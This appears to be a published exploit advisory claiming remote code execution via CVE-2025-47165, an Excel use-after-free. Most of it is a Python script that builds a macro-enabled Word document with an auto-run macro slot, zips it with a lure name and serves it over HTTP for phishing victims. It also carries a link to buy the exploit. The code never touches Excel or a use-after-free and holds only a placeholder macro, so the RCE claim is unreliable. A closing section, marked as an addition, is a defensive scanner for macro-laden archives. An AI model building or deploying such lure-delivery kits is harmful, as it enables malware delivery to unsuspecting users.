# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/24/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
# CVE: CVE-2025-47165
# Versions: Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise

# Description:
The attacker can trick any user into opening and executing their code by sending a malicious DOCM file via email or a streaming server. Once the victim runs it, their machine can be infected, or worse; this could be the end of their Windows machine!

WARNING: AMPUTATE THE MACROS OPTIONS FROM YOUR OFFICE 365!!!

```python
#!/usr/bin/python

import os
import sys
import time
import pythoncom
from win32com.client import Dispatch
import http.server
import socketserver
import socket
import threading
import zipfile

PORT = 8000
DOCM_FILENAME = "salaries.docm"
ZIP_FILENAME = "salaries.zip"
DIRECTORY = "."


def create_docm_with_macro(filename=DOCM_FILENAME):
    pythoncom.CoInitialize()
    word = Dispatch("Word.Application")
    word.Visible = False
    doc = None  # stays None if Documents.Add() fails, so cleanup can check it

    try:
        doc = word.Documents.Add()
        vb_project = doc.VBProject
        vb_component = vb_project.VBComponents("ThisDocument")

        # Placeholder macro body; VBA comments start with an apostrophe.
        macro_code = '''
Sub AutoOpen()
    ' YOUR EXPLOIT HERE
    ' All OF YOU PLEASE WATCH THE DEMO VIDEO
    ' Best Regards to packetstorm.news and OFFSEC
End Sub
'''
        vb_component.CodeModule.AddFromString(macro_code)
        # FileFormat=13 is wdFormatXMLDocumentMacroEnabled (.docm)
        doc.SaveAs(os.path.abspath(filename), FileFormat=13)
        print(f"[+] Macro-enabled Word document created: {filename}")
    except Exception as e:
        print(f"[!] Error creating document: {e}")
    finally:
        if doc is not None:
            doc.Close(False)
        word.Quit()
        pythoncom.CoUninitialize()


def zip_docm(docm_path, zip_path):
    with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED) as zipf:
        zipf.write(docm_path, arcname=os.path.basename(docm_path))
    print(f"[+] Created ZIP archive: {zip_path}")


def get_local_ip():
    # A UDP connect() sends no packets; it only selects the outbound interface.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
    except Exception:
        ip = "127.0.0.1"
    finally:
        s.close()
    return ip


class Handler(http.server.SimpleHTTPRequestHandler):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, directory=DIRECTORY, **kwargs)


def run_server():
    ip = get_local_ip()
    print(f"[+] Starting HTTP server on http://{ip}:{PORT}")
    print("[+] Place your macro docm and zip files in this directory to serve them.")
    print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}")
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        print("[+] Server running, press Ctrl+C to stop")
        httpd.serve_forever()


if __name__ == "__main__":
    if os.name != "nt":
        print("[!] This script only runs on Windows with MS Word installed.")
        sys.exit(1)

    print("[*] Creating the macro-enabled document...")
    create_docm_with_macro(DOCM_FILENAME)

    print("[*] Creating ZIP archive of the document...")
    zip_docm(DOCM_FILENAME, ZIP_FILENAME)

    print("[*] Starting HTTP server in background thread...")
    server_thread = threading.Thread(target=run_server, daemon=True)
    server_thread.start()

    try:
        while True:
            time.sleep(1)  # Keep main thread alive without spinning the CPU
    except KeyboardInterrupt:
        print("\n[!] Server stopped by user.")
```

# Reproduce:
[href](https://www.youtube.com/watch?v=CSb76-OG-Tg)

# Buy an exploit only:
[href](https://satoshidisk.com/pay/COiBVA)

# Time spent:
01:37:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
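
A defender-side check for the delivery format described above (a macro-enabled DOCM wrapped in a ZIP), as an added example that is not part of the original advisory: it inspects each archive member's OOXML package contents rather than trusting its file name. The function names, the size cap and the in-memory sample packages are assumptions constructed for illustration.

```python
import io
import zipfile

MAX_MEMBER_BYTES = 50 * 1024 * 1024  # assumed cap: skip oversized members (zip-bomb guard)

def _package(parts):
    """Build a ZIP/OOXML container in memory from {part name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()

def macro_indicators(data):
    """Return macro indicators for one OOXML package; [] if none or not a ZIP."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return []
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        names = pkg.namelist()
        # Indicators: a vbaProject.bin part, or a "...macroEnabled.main+xml" content type.
        found += [f"vba-part:{n}" for n in names if n.lower().endswith("vbaproject.bin")]
        if "[Content_Types].xml" in names and b"macroenabled" in pkg.read("[Content_Types].xml").lower():
            found.append("macro-enabled-content-type")
    return found

def scan_archive(data):
    """Map each member of an outer ZIP to its macro indicators, whatever its extension."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(data)) as outer:
        for info in outer.infolist():
            if info.is_dir() or info.file_size > MAX_MEMBER_BYTES:
                continue
            indicators = macro_indicators(outer.read(info))
            if indicators:
                hits[info.filename] = indicators
    return hits

def build_sample():
    """Constructed sample: outer ZIP with one macro-enabled and one macro-free package."""
    ct = b'<Types><Override PartName="/word/document.xml" ContentType="%s"/></Types>'
    docm = _package({
        "[Content_Types].xml": ct % b"application/vnd.ms-word.document.macroEnabled.main+xml",
        "word/vbaProject.bin": b"placeholder bytes, not a real VBA project",
    })
    docx = _package({"[Content_Types].xml": ct % (
        b"application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")})
    return _package({"salaries.docm": docm, "notes.docx": docx})

print(scan_archive(build_sample()))
```

Run against mail or proxy attachments, a non-empty result marks an archive member that should be quarantined or stripped before it reaches a user who can enable macros.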